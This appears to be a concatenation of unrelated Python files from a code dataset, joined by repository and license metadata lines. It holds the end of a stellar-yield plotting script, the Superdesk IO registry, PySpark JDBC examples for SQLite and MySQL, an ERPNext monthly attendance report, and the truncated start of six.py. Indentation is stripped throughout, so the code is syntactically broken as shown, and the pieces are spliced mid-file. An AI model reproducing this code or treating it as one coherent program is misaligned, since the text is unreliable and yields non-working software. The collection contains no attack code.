def funtion_plot_yields():
global O_over_Mg_list, Mg_over_Fe_list, C_over_H_list, Mg_over_H_list, Si_over_H_list, Fe_over_H_list, O_over_H_list, Z_over_X_list, Z_over_Z0_list, \
Z_over_H_list, O_over_Fe_list, M_list, Z_list, XXX_list, YYY_list, ZZZ_list
color_list_ = []
for i in range(len(Z_list)):
ZZZ = Z_list[i]
if ZZZ > 0:
Z_box = math.log(ZZZ, 10) - math.log(0.01886, 10)
else:
Z_box = -6
color_list_.append(round(((Z_box+7)**4.001 - (-6.001 + 7) ** 4.001) / ((1 + 7) ** 4.001 - (-6.001 + 7) ** 4.001) * 1000))
colors = plt.cm.hsv_r(np.linspace(0, 1, 1000))
j = 0
while j < len(M_list):
i = 0
while i < len(M_list[j]):
M_list[j][i] = math.log(M_list[j][i], 10)
(i) = (i+1)
(j) = (j+1)
# plt.rc('font', family='serif')
# plt.rc('xtick', labelsize='x-small')
# plt.rc('ytick', labelsize='x-small')
# fig = plt.figure(1, figsize=(4, 3.5))
# plt.xlim(-0.5, 2.2)
# # plt.ylim(0, 2)
# i = len(M_list) - 1
# while i > -1:
# plt.plot(M_list[i], O_over_Mg_list[i], label='Z={}'.format(Z_list[i]))
# (i) = (i - 1)
# O_mass_eject_SNIa = 0.148 # TNH93 0.148 i99CDD1 0.09, i99CDD2 0.06, i99W7 0.14, ivo12/13 0.09-0.1, t03 0.14, t86 0.13
# Mg_mass_eject_SNIa = 0.009 # TNH93 0.009 i99CDD1 0.0077, i99CDD2 0.0042, i99W7 0.0085, ivo12/13 0.015-0.029, t03 0.013, t86 0.016
# O_num = O_mass_eject_SNIa / 15.9994
# Mg_num = Mg_mass_eject_SNIa / 24.305
# O_over_Mg_SNIa = math.log(O_num / Mg_num, 10) - O_abundances_solar + Mg_abundances_solar
# plt.plot([-0.3, 0.9], [O_over_Mg_SNIa, O_over_Mg_SNIa], ls="--", lw=2, label="SNIa")
# plt.legend(prop={'size': 6}, loc='best')
# plt.xlabel(r'log$_{10}$($M_{\rm *, initial}$/[$M_\odot$])')
# plt.ylabel(r'[O/Mg]')
# plt.tight_layout()
# plt.rc('font', family='serif')
# plt.rc('xtick', labelsize='x-small')
# plt.rc('ytick', labelsize='x-small')
# fig = plt.figure(2, figsize=(4, 3.5))
# i = len(M_list) - 1
# while i > -1:
# plt.plot(M_list[i], Mg_over_Fe_list[i], label='Z={}'.format(Z_list[i]))
# (i) = (i - 1)
Mg_mass_eject_SNIa = 0.0158 # TNH93 0.148 i99CDD1 0.09, i99CDD2 0.06, i99W7 0.14, ivo12/13 0.09-0.1, t03 0.14, t86 0.13
Fe_mass_eject_SNIa = 0.68 #0.63 # Recchi2009 halfed to 0.372 # TNH93 0.744 i99CDD1 0.56, i99CDD2 0.76, i99W7 0.63, ivo12/13 0.62-0.67, t03 0.74, t86 0.63
Ca_mass_eject_SNIa = 0.0181
Si_mass_eject_SNIa = 0.142
Ca_num = Ca_mass_eject_SNIa / 40.078
Si_num = Si_mass_eject_SNIa / 28.085
Mg_num = Mg_mass_eject_SNIa / 24.305
Fe_num = Fe_mass_eject_SNIa / 55.845
Mg_over_Fe_SNIa = math.log(Mg_num / Fe_num, 10) - Mg_abundances_solar + Fe_abundances_solar
Si_over_Fe_SNIa = math.log(Si_num / Fe_num, 10) - Si_abundances_solar + Fe_abundances_solar
Ca_over_Fe_SNIa = math.log(Ca_num / Fe_num, 10) - Ca_abundances_solar + Fe_abundances_solar
# plt.plot([-0.3, 0.9], [Mg_over_Fe_SNIa, Mg_over_Fe_SNIa], ls="--", lw=2, label="SNIa")
# plt.plot([-2, 3], [0, 0], lw=0.5, ls='dotted')
# plt.xlim(-0.5, 2.2)
# plt.ylim(-2, 3.5)
# plt.legend(prop={'size': 6}, loc='best')
# plt.xlabel(r'log$_{10}$($M_{\rm *, initial}$ [$M_\odot$])')
# plt.ylabel(r'[Mg/Fe]')
# plt.tight_layout()
# plt.savefig('steller_yield_Mg_over_Fe.pdf', dpi=250)
#
#
# plt.rc('font', family='serif')
# plt.rc('xtick', labelsize='x-small')
# plt.rc('ytick', labelsize='x-small')
# fig = plt.figure(3, figsize=(4, 3.5))
# plt.xlim(-0.5, 2.2)
# plt.ylim(-2, 7)
# i = len(M_list) - 1
# while i > -1:
# plt.plot(M_list[i], O_over_Fe_list[i], label='Z={}'.format(Z_list[i]))
# (i) = (i - 1)
# O_over_Fe_SNIa = math.log(O_num / Fe_num, 10) - O_abundances_solar + Fe_abundances_solar
# plt.plot([-0.3, 0.9], [O_over_Fe_SNIa, O_over_Fe_SNIa], ls="--", lw=2, label="SNIa")
# plt.legend(prop={'size': 6}, loc='best')
# plt.xlabel(r'log$_{10}$($M_{\rm *, initial}$/[$M_\odot$])')
# plt.ylabel(r'[O/Fe]')
# plt.tight_layout()
# #
# plt.rc('font', family='serif')
# plt.rc('xtick', labelsize='x-small')
# plt.rc('ytick', labelsize='x-small')
# fig = plt.figure(4, figsize=(4, 3.5))
# plt.xlim(-0.5, 2.2)
# plt.ylim(-2, 2)
# i = len(M_list) - 1
# while i > -1:
# plt.plot(M_list[i], Mg_over_H_list[i], label='Z={}'.format(Z_list[i]))
# (i) = (i - 1)
# plt.plot([-2, 3], [0, 0], lw=0.1)
# plt.legend(prop={'size': 6}, loc='best')
# plt.xlabel(r'log$_{10}$($M_{\rm *, initial}$/[$M_\odot$])')
# plt.ylabel(r'[Mg/H]')
# plt.tight_layout()
# #
# plt.rc('font', family='serif')
# plt.rc('xtick', labelsize='x-small')
# plt.rc('ytick', labelsize='x-small')
# fig = plt.figure(42, figsize=(4, 3.5))
# plt.xlim(-0.5, 2.2)
# plt.ylim(-2, 2)
# i = len(M_list) - 1
# while i > -1:
# plt.plot(M_list[i], Si_over_H_list[i], label='Z={}'.format(Z_list[i]))
# (i) = (i - 1)
# plt.plot([-2, 3], [0, 0], lw=0.1)
# plt.legend(prop={'size': 6}, loc='best')
# plt.xlabel(r'log$_{10}$($M_{\rm *, initial}$/[$M_\odot$])')
# plt.ylabel(r'[Si/H]')
# plt.tight_layout()
# #
# plt.rc('font', family='serif')
# plt.rc('xtick', labelsize='x-small')
# plt.rc('ytick', labelsize='x-small')
# fig = plt.figure(41, figsize=(4, 3.5))
# plt.xlim(-0.5, 2.2)
# # plt.ylim(-2, 2)
# i = len(M_list) - 1
# while i > -1:
# plt.plot(M_list[i], C_over_H_list[i], label='Z={}'.format(Z_list[i]))
# (i) = (i - 1)
# plt.plot([-2, 3], [0, 0], lw=0.1)
# plt.legend(prop={'size': 6}, loc='best')
# plt.xlabel(r'log$_{10}$($M_{\rm *, initial}$/[$M_\odot$])')
# plt.ylabel(r'[C/H]')
# plt.tight_layout()
# plt.savefig('steller_yield_Mg.pdf', dpi=250)
#
# plt.rc('font', family='serif')
# plt.rc('xtick', labelsize='x-small')
# plt.rc('ytick', labelsize='x-small')
# fig = plt.figure(5, figsize=(4, 3.5))
# plt.xlim(-0.5, 2.2)
# plt.ylim(-2, 2)
# i = len(M_list) - 1
# while i > -1:
# plt.plot(M_list[i], O_over_H_list[i], label='Z={}'.format(Z_list[i]))
# (i) = (i - 1)
# plt.plot([-2, 3], [0, 0], lw=0.1)
# plt.legend(prop={'size': 6}, loc='best')
# plt.xlabel(r'log$_{10}$($M_{\rm *, initial}$/[$M_\odot$])')
# plt.ylabel(r'[O/H]')
# plt.tight_layout()
# # plt.savefig('steller_yield_O.pdf', dpi=250)
#
# plt.rc('font', family='serif')
# plt.rc('xtick', labelsize='x-small')
# plt.rc('ytick', labelsize='x-small')
# fig = plt.figure(6, figsize=(4, 3.5))
# plt.xlim(-0.5, 2.2)
# plt.ylim(-2, 2)
# i = len(M_list)-1
# while i > -1:
# plt.plot(M_list[i], Fe_over_H_list[i], label='Z={}'.format(Z_list[i]))
# (i) = (i - 1)
# plt.plot([-2, 3], [0, 0], lw=0.1)
# plt.legend(prop={'size': 6}, loc='best')
# plt.xlabel(r'log$_{10}$($M_{\rm *, initial}$/[$M_\odot$])')
# plt.ylabel(r'[Fe/H]')
# plt.tight_layout()
# # plt.savefig('steller_yield_Fe.pdf', dpi=250)
#
# plt.rc('font', family='serif')
# plt.rc('xtick', labelsize='x-small')
# plt.rc('ytick', labelsize='x-small')
# fig = plt.figure(7, figsize=(4, 3.5))
# plt.xlim(-0.5, 2.2)
# plt.ylim(-2, 2)
# i = len(M_list) - 1
# while i > -1:
# plt.plot(M_list[i], Z_over_H_list[i], label='Z={}'.format(Z_list[i]))
# (i) = (i - 1)
# plt.plot([-2, 3], [0, 0], lw=0.1)
# plt.legend(prop={'size': 6}, loc='best')
# plt.xlabel(r'log$_{10}$($M_{\rm *, initial}$/[$M_\odot$])')
# plt.ylabel(r'[Z/H]')
# plt.title("Number ratio")
# plt.tight_layout()
#
# plt.rc('font', family='serif')
# plt.rc('xtick', labelsize='x-small')
# plt.rc('ytick', labelsize='x-small')
# fig = plt.figure(8, figsize=(4, 3.5))
# plt.xlim(-0.5, 2.2)
# plt.ylim(-2, 2)
# i = len(M_list) - 1
# while i > -1:
# plt.plot(M_list[i], Z_over_X_list[i], label='Z={}'.format(Z_list[i]))
# (i) = (i - 1)
# plt.plot([-2, 3], [0, 0], lw=0.1)
# plt.legend(prop={'size': 6}, loc='best')
# plt.xlabel(r'log$_{10}$($M_{\rm *, initial}$/[$M_\odot$])')
# plt.ylabel(r'[Z/X]')
# plt.title("Mass ratio")
# plt.tight_layout()
#
# plt.rc('font', family='serif')
# plt.rc('xtick', labelsize='x-small')
# plt.rc('ytick', labelsize='x-small')
# fig = plt.figure(11, figsize=(4, 3.5))
# plt.xlim(-0.5, 2.2)
# plt.ylim(0.23, 0.6)
# i = len(M_list) - 1
# while i > -1:
# plt.plot(M_list[i], YYY_list[i], label='Z={}'.format(Z_list[i]))
# (i) = (i - 1)
# # plt.plot([-2, 3], [0.25, 0.25], lw=0.5)
# plt.legend(prop={'size': 6}, loc='best')
# plt.xlabel(r'log$_{10}$($M_{\rm *, initial}$/[$M_\odot$])')
# plt.ylabel('Y')
# plt.tight_layout()
# # plt.savefig('steller_yield_Y.pdf', dpi=250)
##########
fig, axs = plt.subplots(3, 1, sharex=True, figsize=(3, 4))
# i = len(M_list) - 1
# while i > -1:
# axs[0].plot(M_list[i], Z_over_Z0_list[i], lw=(i+2)/2, color=colors[color_list_[i]])
# (i) = (i - 1)
# axs[0].plot([-2, 3], [0, 0], lw=0.7, ls='dotted')
# # axs[0].set_yticks(np.arange(-1, 2.1, 1))
# axs[0].set_ylim(-2, 1.6)
# axs[0].set_ylabel(r'[Z]')
#
# i = len(M_list) - 1
# while i > -1:
# # axs[1].plot(M_list[i], XXX_list[i], lw=(i+2)/2, color=colors[color_list_[i]])
# axs[1].plot(M_list[i], YYY_list[i], lw=(i+2)/2, color=colors[color_list_[i]])
# # axs[1].plot(M_list[i], ZZZ_list[i], lw=(i+2)/2, color=colors[color_list_[i]])
# (i) = (i - 1)
# axs[1].plot([-2, 3], [0.273, 0.273], lw=0.7, ls='dotted')
# # axs[1].set_yticks(np.arange(0.2, 0.61, 0.1))
# axs[1].set_ylim(0.24, 0.605)
# axs[1].set_xlim(-0.5, 2.2)
# axs[1].set_ylabel('Y')
# axs[0].plot([1.3073, 1.3073], [-0.1, 1.7], lw=0.2)
axs[0].axvspan(1.3073, 3, alpha=0.2, color='red')
i = len(M_list) - 1
while i > -1:
ZZZ = Z_list[i]
if ZZZ > 0:
Z_box = round(math.log(ZZZ, 10) - math.log(0.01886, 10), 2)
else:
Z_box = -6
M_list[i].insert(0, math.log(150, 10))
Mg_over_Fe_list[i].insert(0, Mg_over_Fe_list[i][0])
axs[0].plot(M_list[i], Mg_over_Fe_list[i], lw=2**i*0.7, label=r'$Z={}$'.format(ZZZ), color='k', ls=['-', 'dashed', 'dotted'][i])
(i) = (i - 1)
# axs[0].plot([-0.3, 0.9], [Mg_over_Fe_SNIa, Mg_over_Fe_SNIa], ls="--", lw=1, label="SNIa", c='k')
# axs[0].plot([-2, 3], [0, 0], lw=0.7, ls='dotted')
# axs[0].set_yticks(np.arange(-2, 2.1, 2))
axs[0].set_xlim(0.7, 1.7)
axs[0].set_ylim(-0.1, 1.7)
axs[0].set_ylabel(r'[Mg/Fe]')
axs[0].set_xlabel(r'log$_{10}(M_{\rm *, initial}$ [$M_\odot$])')
axs[0].legend(prop={'size': 6}, loc='best')
axs[1].axvspan(1.3073, 3, alpha=0.2, color='red')
i = len(M_list) - 1
while i > -1:
Si_over_Fe_list[i].insert(0, Si_over_Fe_list[i][0])
axs[1].plot(M_list[i], Si_over_Fe_list[i], lw=2**i*0.7, label=r'$Z={}$'.format(ZZZ),
color='k', ls=['-', 'dashed', 'dotted'][i])
(i) = (i - 1)
# axs[1].plot([-0.3, 0.9], [Si_over_Fe_SNIa, Si_over_Fe_SNIa], ls="--", lw=1, label="SNIa", c='k')
# axs[1].plot([-2, 3], [0, 0], lw=0.7, ls='dotted')
# axs[1].set_yticks(np.arange(-2, 2.1, 2))
axs[1].set_ylim(-0.1, 1.7)
axs[1].set_ylabel(r'[Si/Fe]')
axs[1].set_xlabel(r'log$_{10}(M_{\rm *, initial}$ [$M_\odot$])')
# axs[1].legend(prop={'size': 6}, loc='best')
axs[2].axvspan(1.3073, 3, alpha=0.2, color='red')
i = len(M_list) - 1
while i > -1:
Ca_over_Fe_list[i].insert(0, Ca_over_Fe_list[i][0])
axs[2].plot(M_list[i], Ca_over_Fe_list[i], lw=2**i*0.7, label=r'$Z={}$'.format(ZZZ),
color='k', ls=['-', 'dashed', 'dotted'][i])
(i) = (i - 1)
# axs[2].plot([-0.3, 0.9], [Ca_over_Fe_SNIa, Ca_over_Fe_SNIa], ls="--", lw=1, label="SNIa", c='k')
# axs[2].plot([-2, 3], [0, 0], lw=0.7, ls='dotted')
# axs[2].set_yticks(np.arange(-2, 2.1, 2))
axs[2].set_ylim(-0.1, 1.7)
axs[2].set_ylabel(r'[Ca/Fe]')
axs[2].set_xlabel(r'log$_{10}(M_{\rm *, initial}$ [$M_\odot$])')
# axs[2].legend(prop={'size': 6}, loc='best')
plt.tight_layout()
# Remove horizontal space between axes
fig.subplots_adjust(hspace=0)
plt.savefig('stellar_yields.pdf', dpi=250)
plt.show()
return
if __name__ == '__main__':
start_time = time.time()
Z_list = []
M_list = []
eject_mass_list = []
H_eject_mass_list = []
He_eject_mass_list = []
C_eject_mass_list = []
N_eject_mass_list = []
O_eject_mass_list = []
Ne_eject_mass_list = []
Mg_eject_mass_list = []
Si_eject_mass_list = []
S_eject_mass_list = []
Ca_eject_mass_list = []
Fe_eject_mass_list = []
Metal_eject_mass_list = []
O_over_Mg_list = []
Mg_over_H_list = []
Si_over_H_list = []
C_over_H_list = []
Fe_over_H_list = []
O_over_H_list = []
Z_over_H_list = []
Z_over_X_list = []
Z_over_Z0_list = []
XXX_list = []
YYY_list = []
ZZZ_list = []
Mg_over_Fe_list = []
Si_over_Fe_list = []
Ca_over_Fe_list = []
O_over_Fe_list = []
yield_table_name = "Kobayashi06" # being "WW95" or "portinari98" or "marigo01"
function_read_file(yield_table_name)
funtion_plot_yields()
plot_lifetime_and_finalmass()
print(" - Run time: %s -" % round((time.time() - start_time), 2)) | gpl-3.0 |
superdesk/superdesk-core | superdesk/io/registry.py | 2 | 6016 | # -*- coding: utf-8; -*-
#
# This file is part of Superdesk.
#
# Copyright 2013, 2014 Sourcefabric z.u. and contributors.
#
# For the full copyright and license information, please see the
# AUTHORS and LICENSE files distributed with this source code, or
# at https://www.sourcefabric.org/superdesk/license
"""Superdesk IO Registry"""
from superdesk import Resource, Service
from superdesk.utils import ListCursor
from superdesk.errors import SuperdeskIngestError, AlreadyExistsError
registered_feed_parsers = {}
allowed_feed_parsers = []
registered_feeding_services = {}
allowed_feeding_services = []
feeding_service_errors = {}
publish_errors = []
restricted_feeding_service_parsers = {}
def register_feeding_service(service_class):
"""
Registers the Feeding Service with the application.
:class: `superdesk.io.feeding_services.RegisterFeedingService` uses this function to register the feeding service.
:param service_class: Feeding Service class
:raises: AlreadyExistsError if a feeding service with same name already been registered
"""
if service_class.NAME in registered_feeding_services:
raise AlreadyExistsError(
"Feeding Service: {} already registered by {}".format(
service_class.NAME, registered_feeding_services[service_class.NAME]
)
)
registered_feeding_services[service_class.NAME] = service_class
allowed_feeding_services.append(service_class.NAME)
service_class.ERRORS.append(SuperdeskIngestError.parserNotFoundError().get_error_description())
feeding_service_errors[service_class.NAME] = dict(service_class.ERRORS)
def register_feeding_service_error(service_name, error):
"""
Registers an error with the service named
:param service_name: unique name to identify the Feeding Service class
:param error: tuple representing the error, the tuple contains the error_code and the error message
:return:
"""
feeding_service_errors.get(service_name, {}).update(dict([error]))
def get_feeding_service(service_name):
"""
Create and return Feeding Service instance.
:param service_name: unique name to identify the Feeding Service class.
:return: Feeding Service instance.
:raise KeyError: there is no feeding service registered with this `service_name`.
"""
return registered_feeding_services[service_name]()
def register_feed_parser(parser_name, parser_class):
"""
Registers the Feed Parser with the application.
:class: `superdesk.io.feed_parsers.RegisterFeedParser` uses this function to register the feed parser.
:param parser_name: unique name to identify the Feed Parser class
:param parser_class: Feed Parser class
:raises: AlreadyExistsError if a feed parser with same name already been registered
"""
if parser_name in registered_feed_parsers:
raise AlreadyExistsError(
"Feed Parser: {} already registered by {}".format(parser_name, type(registered_feed_parsers[parser_name]))
)
registered_feed_parsers[parser_name] = parser_class
allowed_feed_parsers.append(parser_name)
def register_feeding_service_parser(service_name, parser_name):
"""
Registers the Feed Parser with the Feeding service.
:param service_name: unique name to identify the Feeding Service class
:param parser_name: unique name to identify the Feed Parser class
None if the feeding service doesn't expect any parser
"""
if not restricted_feeding_service_parsers.get(service_name):
restricted_feeding_service_parsers[service_name] = {}
if parser_name is None:
if restricted_feeding_service_parsers[service_name]:
raise ValueError("You can't set None to a feeding service if some parsers are already registered")
restricted_feeding_service_parsers[service_name] = None
else:
restricted_feeding_service_parsers[service_name][parser_name] = True
def get_feed_parser(parser_name):
"""
Retrieve registered feed parser class from its name
:param parser_name: name of the parser, as in register_feed_parser
:type parser_name: str
:return str: feed parser class
:raise KeyError: there is no parser registered with this name
"""
return registered_feed_parsers[parser_name]
class FeedParserAllowedResource(Resource):
resource_methods = ["GET"]
item_methods = []
allow_unknown = True
class FeedParserAllowedService(Service):
def get(self, req, lookup):
def parser(parser_id):
registered = registered_feed_parsers[parser_id]
return {"feed_parser": parser_id, "label": getattr(registered, "label", parser_id)}
return ListCursor([parser(_id) for _id in registered_feed_parsers])
class FeedingServiceAllowedResource(Resource):
resource_methods = ["GET"]
item_methods = []
schema = {
"feeding_service": {"type": "string"},
"label": {"type": "string"},
"fields": {"type": "list"},
"field_groups": {"type": "dict", "schema": {}},
"parser_restricted_values": {"type": "list"},
}
class FeedingServiceAllowedService(Service):
def get(self, req, lookup):
def service(service_id):
feeding_service_class = registered_feeding_services[service_id]
restricted_parsers = restricted_feeding_service_parsers.get(service_id, {})
if restricted_parsers is not None:
restricted_parsers = list(restricted_parsers.keys())
fields = getattr(feeding_service_class, "fields", [])
return {
"feeding_service": service_id,
"label": getattr(feeding_service_class, "label", service_id),
"fields": fields,
"field_groups": getattr(feeding_service_class, "field_groups", {}),
"parser_restricted_values": restricted_parsers,
}
return ListCursor([service(_id) for _id in registered_feeding_services])
| agpl-3.0 |
sangwook236/SWDT | sw_dev/python/ext/test/high_performance_computing/spark/pyspark_database.py | 2 | 5564 | #!/usr/bin/env python
from pyspark.sql import SparkSession
import pyspark.sql.types as types
import pyspark.sql.functions as func
import traceback, sys
# REF [site] >> https://spark.apache.org/docs/latest/sql-programming-guide.html#jdbc-to-other-databases
def sqlite_jdbc():
spark = SparkSession.builder.appName('sqlite-jdbc') \
.config('spark.jars.packages', 'org.xerial:sqlite-jdbc:3.23.1') \
.getOrCreate()
#spark = SparkSession.builder.appName('sqlite-jdbc') \
# .config('spark.jars', 'sqlite-jdbc-3.23.1.jar') \
# .getOrCreate()
spark.sparkContext.setLogLevel('WARN')
# REF [site] >> https://spark.apache.org/docs/latest/sql-programming-guide.html#pyspark-usage-guide-for-pandas-with-apache-arrow
# Enable Arrow-based columnar data transfers.
spark.conf.set('spark.sql.execution.arrow.enabled', 'true')
if False:
#db_url = 'jdbc:sqlite:/path/to/dbfile' # File DB.
df = spark.read \
.format('jdbc') \
.option('url', 'jdbc:sqlite:iris.db') \
.option('driver', 'org.sqlite.JDBC') \
.option('dbtable', 'iris') \
.load()
elif False:
# REF [site] >> https://www.sqlite.org/inmemorydb.html
#db_url = 'jdbc:sqlite::memory:' # In-memory DB.
db_url = 'jdbc:sqlite::memory:?cache=shared' # Shared in-memory DB.
#db_url = 'jdbc:sqlite:dbname?mode=memory&cache=shared' # Named, shared in-memory DB.
# NOTE [error] >> Requirement failed: Option 'dbtable' is required.
# NOTE [error] >> SQL error or missing database (no such table: test123).
df = spark.read \
.format('jdbc') \
.option('url', db_url) \
.option('driver', 'org.sqlite.JDBC') \
.option('dbtable', 'test123') \
.load()
else:
rdd = spark.sparkContext.parallelize([
(123, 'Katie', 19, 'brown'),
(234, 'Michael', 22, 'green'),
(345, 'Simone', 23, 'blue')
])
# Specify schema.
schema = types.StructType([
types.StructField('id', types.LongType(), True),
types.StructField('name', types.StringType(), True),
types.StructField('age', types.LongType(), True),
types.StructField('eyeColor', types.StringType(), True)
])
df = spark.createDataFrame(rdd, schema)
df.show()
# NOTE [info] >> It seems that only file DB of SQLite can be used in Spark.
db_url = 'jdbc:sqlite:test.sqlite' # File DB.
# Isolation level: NONE, READ_COMMITTED, READ_UNCOMMITTED, REPEATABLE_READ, SERIALIZABLE.
# REF [site] >> https://stackoverflow.com/questions/16162357/transaction-isolation-levels-relation-with-locks-on-table
df.write \
.format('jdbc') \
.mode('overwrite') \
.option('url', db_url) \
.option('driver', 'org.sqlite.JDBC') \
.option('dbtable', 'swimmers') \
.option('isolationLevel', 'NONE') \
.save()
#df.write.jdbc(url=db_url, table='test', mode='overwrite', properties={'driver': 'org.sqlite.JDBC'})
df1 = df.withColumn('gender', func.lit(0))
df2 = spark.createDataFrame(
[(13, 'Lucy', 12, 'brown'), (37, 'Brian', 47, 'black')],
('id', 'name', 'age', 'eyeColor')
)
df2.write \
.format('jdbc') \
.mode('append') \
.option('url', db_url) \
.option('driver', 'org.sqlite.JDBC') \
.option('dbtable', 'swimmers') \
.option('isolationLevel', 'NONE') \
.save()
def mysql_jdbc():
spark = SparkSession.builder.appName('mysql-jdbc') \
.config('spark.jars.packages', 'mysql:mysql-connector-java:8.0.12') \
.getOrCreate()
#spark = SparkSession.builder.appName('mysql-jdbc') \
# .config('spark.jars', 'mysql-connector-java-8.0.12-bin.jar') \
# .getOrCreate()
spark.sparkContext.setLogLevel('WARN')
# REF [site] >> https://spark.apache.org/docs/latest/sql-programming-guide.html#pyspark-usage-guide-for-pandas-with-apache-arrow
# Enable Arrow-based columnar data transfers.
spark.conf.set('spark.sql.execution.arrow.enabled', 'true')
df = spark.read \
.format('jdbc') \
.option('url', 'jdbc:mysql://host:3306/dbname?characterEncoding=UTF-8&serverTimezone=UTC') \
.option('driver', 'com.mysql.cj.jdbc.Driver') \
.option('dbtable', 'tablename') \
.option('user', 'username') \
.option('password', 'password') \
.load()
df.show()
def sql_basic():
spark = SparkSession.builder.appName('dataframe-operation').getOrCreate()
spark.sparkContext.setLogLevel('WARN')
df = spark.createDataFrame(
[(123, 'Katie', 19, 'brown'), (234, 'Michael', 22, 'green'), (345, 'Simone', 23, 'blue')],
('id', 'name', 'age', 'eyeColor')
)
#df.printSchema()
#df.cache()
df.createOrReplaceTempView('swimmers') # DataFrame -> SQL.
#df1 = spark.sql('select * from swimmers') # SQL -> DataFrame.
spark.sql('select * from swimmers where age >= 20').show()
#spark.catalog.dropTempView('swimmers')
def main():
#sqlite_jdbc()
#mysql_jdbc()
sql_basic()
#%%------------------------------------------------------------------
# Usage:
# python pyspark_database.py
# spark-submit --packages mysql:mysql-connector-java:8.0.12,org.xerial:sqlite-jdbc:3.23.1 pyspark_database.py
# spark-submit --master local[4] --packages mysql:mysql-connector-java:8.0.12,org.xerial:sqlite-jdbc:3.23.1 pyspark_database.py
# spark-submit --master spark://host:7077 --packages mysql:mysql-connector-java:8.0.12,org.xerial:sqlite-jdbc:3.23.1 --executor-memory 10g pyspark_database.py
if '__main__' == __name__:
try:
main()
except:
#ex = sys.exc_info() # (type, exception object, traceback).
##print('{} raised: {}.'.format(ex[0], ex[1]))
#print('{} raised: {}.'.format(ex[0].__name__, ex[1]))
#traceback.print_tb(ex[2], limit=None, file=sys.stdout)
#traceback.print_exception(*sys.exc_info(), limit=None, file=sys.stdout)
traceback.print_exc(limit=None, file=sys.stdout)
| gpl-3.0 |
lasalesi/erpnext | erpnext/schools/report/student_monthly_attendance_sheet/student_monthly_attendance_sheet.py | 4 | 3812 | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
from frappe.utils import cstr, cint, getdate, get_first_day, get_last_day, date_diff, add_days
from frappe import msgprint, _
from calendar import monthrange
from erpnext.schools.api import get_student_batch_students
def execute(filters=None):
if not filters: filters = {}
from_date = get_first_day(filters["month"] + '-' + filters["year"])
to_date = get_last_day(filters["month"] + '-' + filters["year"])
total_days_in_month = date_diff(to_date, from_date) +1
columns = get_columns(total_days_in_month)
students = get_student_batch_students(filters.get("student_batch"))
students_list = get_students_list(students)
att_map = get_attendance_list(from_date, to_date, filters.get("student_batch"), students_list)
data = []
for stud in students:
row = [stud.student, stud.student_name]
date = from_date
total_p = total_a = 0.0
for day in range(total_days_in_month):
status="None"
if att_map.get(stud.student):
status = att_map.get(stud.student).get(date, "None")
status_map = {"Present": "P", "Absent": "A", "None": ""}
row.append(status_map[status])
if status == "Present":
total_p += 1
elif status == "Absent":
total_a += 1
date = add_days(date, 1)
row += [total_p, total_a]
data.append(row)
return columns, data
def get_columns(days_in_month):
columns = [ _("Student") + ":Link/Student:90", _("Student Name") + "::150"]
for day in range(days_in_month):
columns.append(cstr(day+1) +"::20")
columns += [_("Total Present") + ":Int:95", _("Total Absent") + ":Int:90"]
return columns
def get_students_list(students):
student_list = []
for stud in students:
student_list.append(stud.student)
return student_list
def get_attendance_list(from_date, to_date, student_batch, students_list):
attendance_list = frappe.db.sql("""select student, date, status
from `tabStudent Attendance` where student_batch = %s
and date between %s and %s
order by student, date""",
(student_batch, from_date, to_date), as_dict=1)
att_map = {}
students_with_leave_application = get_students_with_leave_application(from_date, to_date, students_list)
for d in attendance_list:
att_map.setdefault(d.student, frappe._dict()).setdefault(d.date, "")
if students_with_leave_application and d.student in students_with_leave_application.get(d.date):
att_map[d.student][d.date] = "Present"
else:
att_map[d.student][d.date] = d.status
return att_map
def get_students_with_leave_application(from_date, to_date, students_list):
leave_applications = frappe.db.sql("""
select student, from_date, to_date
from `tabStudent Leave Application`
where
mark_as_present and docstatus = 1
and student in %(students)s
and (
from_date between %(from_date)s and %(to_date)s
or to_date between %(from_date)s and %(to_date)s
or (%(from_date)s between from_date and to_date and %(to_date)s between from_date and to_date)
)
""", {
"students": students_list,
"from_date": from_date,
"to_date": to_date
}, as_dict=True)
students_with_leaves= {}
for application in leave_applications:
for date in daterange(application.from_date, application.to_date):
students_with_leaves.setdefault(date, []).append(application.student)
return students_with_leaves
def daterange(d1, d2):
import datetime
return (d1 + datetime.timedelta(days=i) for i in range((d2 - d1).days + 1))
@frappe.whitelist()
def get_attendance_years():
year_list = frappe.db.sql_list("""select distinct YEAR(date) from `tabStudent Attendance` ORDER BY YEAR(date) DESC""")
if not year_list:
year_list = [getdate().year]
return "\n".join(str(year) for year in year_list)
| gpl-3.0 |
Huskerboy/startbootstrap-freelancer | freelancer_env/Lib/site-packages/pip/_vendor/requests/packages/urllib3/packages/six.py | 2715 | 30098 | """Utilities for writing code that runs on Python 2 and 3"""
# Copyright (c) 2010-2015 Benjamin Peterson
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from __future__ import absolute_import
import functools
import itertools
import operator
import sys
import types
__author__ = "Benjamin Peterson <benjamin@python.org>"
__version__ = "1.10.0"
# Useful for very coarse version differentiation.
PY2 = sys.version_info[0] == 2
PY3 = sys.version_info[0] == 3
PY34 = sys.version_info[0:2] >= (3, 4)
if PY3:
string_types = str,
integer_types = int,
class_types = type,
text_type = str
binary_type = bytes
MAXSIZE = sys.maxsize
else:
string_types = basestring,
integer_types = (int, long)
class_types = (type, types.ClassType)
text_type = unicode
binary_type = str
if sys.platform.startswith("java"):
# Jython always uses 32 bits.
MAXSIZE = int((1 << 31) - 1)
else:
# It's possible to have sizeof(long) != sizeof(Py_ssize_t).
class X(object):
def __len__(self):
return 1 << 31
try:
len(X())
except OverflowError:
# 32-bit
